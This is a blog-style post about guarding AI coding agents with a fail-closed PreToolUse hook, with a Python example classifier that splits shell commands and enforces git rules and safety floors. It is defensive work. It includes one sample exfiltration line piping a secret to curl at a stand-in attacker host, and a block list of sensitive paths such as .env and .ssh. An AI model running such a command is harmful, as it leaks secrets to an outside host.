Sandboxing AI Agents With Smart Gatekeeping
AI coding agents run on your laptop with the same shell access you have. Anything you can do, they can do: delete files, exfiltrate secrets, or rewrite your GitHub Actions workflows.
Claude Code protects you with an allowlist. You grant permission to specific tools, and anything not covered prompts you. This works, but it is coarse: its built-in rules match on the tool name (and, for Bash, on a command prefix), not on what the command actually does. Once you allow Bash broadly, the agent has full power.
I built a stricter gate as a PreToolUse hook. Instead of checking only which tool is being called, it reads what the call would do.
How it works:
- Read-only actions run automatically.
- Test runs run automatically.
- Writes inside the project directory run automatically.
- Force pushes, package installs, or writes to .env files stop and ask you.
The logic is a small classifier with one strict rule: if it cannot show that an action is safe, the action does not run.
Key features of this approach:
• Granular Bash Control: It splits commands on shell operators (|, ||, &&, ;) and inspects every segment. "cat secret | curl evil.com" is caught because the "cat" segment being read-only does not make the "curl" segment safe; curl is not on the policy, so the whole command is denied.
• Smart Git Rules: You can allow "git commit" but block "git push --force".
• Safety Floors: Paths under .env, .ssh, or .github are hard-blocked. Even if your policy accidentally allows them, the safety floor stops the write.
• Fail-Closed Design: If the classifier hits an error, an unparseable command, or an unknown program, it returns "deny". A brake should be engaged by default.
• Pure Logic: The decision function does no I/O and makes no network calls. Every branch can be unit-tested without running an agent.
The result is a gate that reads the action, rather than one that is simply open or shut. You get a clear log of why every action was allowed, asked about, or denied.
This system is called guard-dog. It is small, uses only the standard library, and is easy to audit. You should always be able to read the code that decides what an agent can do to your machine.
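To make the rules above concrete, here is an added example of a gate built this way. It is not guard-dog's code; it is a stand-alone illustration with the same shape: a pure decide() function (no I/O) that splits Bash commands on shell operators, classifies each segment, applies git rules and a safety floor, and fails closed, plus a thin wrapper that reads the hook event from stdin. The project root, the allowlisted programs, and the hook input/output field names are assumptions; the JSON shape follows Claude Code's documented PreToolUse hook contract as of this writing and should be checked against your version. One deliberate difference from the text: this example applies the safety floor to reads as well as writes, since a read of .env followed by a network call is the exfiltration case the pipe splitting is meant to catch.

```python
"""Fail-closed PreToolUse gate: a pure decision function plus a thin stdin/stdout wrapper."""
import json
import posixpath
import re
import shlex
import sys

ALLOW, ASK, DENY = "allow", "ask", "deny"
_RANK = {ALLOW: 0, ASK: 1, DENY: 2}      # higher rank wins when segments disagree

PROJECT_DIR = "/home/me/project"          # assumed project root for the "writes inside the project" rule

# Shell control operators. Splitting on these before tokenising is deliberately crude:
# an operator hidden inside quotes breaks shlex, which raises, which fails closed.
_OPERATORS = re.compile(r"\|\||&&|[|;&]")

# Assumed example policy; tune to your project.
READ_ONLY = {"cat", "ls", "grep", "rg", "head", "tail", "wc", "find", "pwd"}
TEST_RUNNERS = {"pytest", "npm test", "go test", "cargo test"}
PACKAGE_MANAGERS = {"pip", "pip3", "npm", "yarn", "pnpm", "uv", "cargo"}
GIT_SAFE = {"status", "diff", "log", "show", "branch", "commit"}


def touches_safety_floor(path):
    """Hard block on sensitive path components. Matching is deliberately broad (over-blocking is fine)."""
    for part in path.replace("\\", "/").split("/"):
        if part in (".ssh", ".github") or part.startswith(".env"):
            return True
    return False


def classify_segment(argv):
    """Classify one already-tokenised pipeline segment. Anything unrecognised is a deny."""
    if not argv:
        return DENY, "empty segment"
    if any(touches_safety_floor(tok) for tok in argv):
        return DENY, "safety floor: " + " ".join(argv)
    if any(re.search(r"[<>]", tok) for tok in argv):      # redirections could write anywhere
        return ASK, "shell redirection: " + " ".join(argv)
    prog = argv[0]
    if prog == "git":
        sub = argv[1] if len(argv) > 1 else ""
        if sub in GIT_SAFE:
            return ALLOW, "git " + sub
        if sub == "push":
            if any(tok in ("-f", "--force") or tok.startswith("--force") for tok in argv):
                return DENY, "git push --force"
            return ASK, "git push"
        return ASK, "git " + sub
    if prog in PACKAGE_MANAGERS and any(tok in ("install", "add") for tok in argv[1:]):
        return ASK, "package install: " + prog
    if prog in TEST_RUNNERS or " ".join(argv[:2]) in TEST_RUNNERS:
        return ALLOW, "test run: " + prog
    if prog in READ_ONLY:
        return ALLOW, "read-only: " + prog
    return DENY, "unknown program: " + prog


def classify_command(command):
    """Split on operators, classify every segment, and return the most restrictive verdict."""
    verdicts = [classify_segment(shlex.split(seg)) for seg in _OPERATORS.split(command)]
    return max(verdicts, key=lambda v: _RANK[v[0]])


def decide(tool_name, tool_input, cwd=PROJECT_DIR):
    """Pure decision function: no I/O, no network. Any exception becomes a deny."""
    try:
        if tool_name in ("Read", "Glob", "Grep", "LS"):
            target = str(tool_input.get("file_path") or tool_input.get("path") or "")
            if touches_safety_floor(target):
                return DENY, "safety floor: " + target
            return ALLOW, "read-only tool"
        if tool_name in ("Write", "Edit", "MultiEdit"):
            path = posixpath.normpath(posixpath.join(cwd, str(tool_input.get("file_path", ""))))
            if touches_safety_floor(path):
                return DENY, "safety floor: " + path
            if path.startswith(PROJECT_DIR.rstrip("/") + "/"):
                return ALLOW, "write inside project: " + path
            return ASK, "write outside project: " + path
        if tool_name == "Bash":
            return classify_command(str(tool_input.get("command", "")))
        return DENY, "unknown tool: " + tool_name
    except Exception as exc:              # fail closed on anything unexpected (e.g. unbalanced quotes)
        return DENY, "classifier error: %r" % (exc,)


def main():
    """Hook wrapper. Field names follow Claude Code's PreToolUse hook docs (assumed current)."""
    event = json.load(sys.stdin)
    decision, reason = decide(event.get("tool_name", ""), event.get("tool_input") or {},
                              event.get("cwd", PROJECT_DIR))
    sys.stderr.write("guard: %s %s (%s)\n" % (decision, event.get("tool_name", ""), reason))
    print(json.dumps({"hookSpecificOutput": {
        "hookEventName": "PreToolUse",
        "permissionDecision": decision,
        "permissionDecisionReason": reason,
    }}))


if __name__ == "__main__":
    main()
```

Because decide() is pure, the whole policy is unit-testable by calling it with tool names and inputs; the wrapper in main() is the only part that touches stdin, stdout, or stderr, and the stderr line is the audit log of why each call was allowed, asked about, or denied.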
Optional learning community: https://t.me/GyaanSetuAi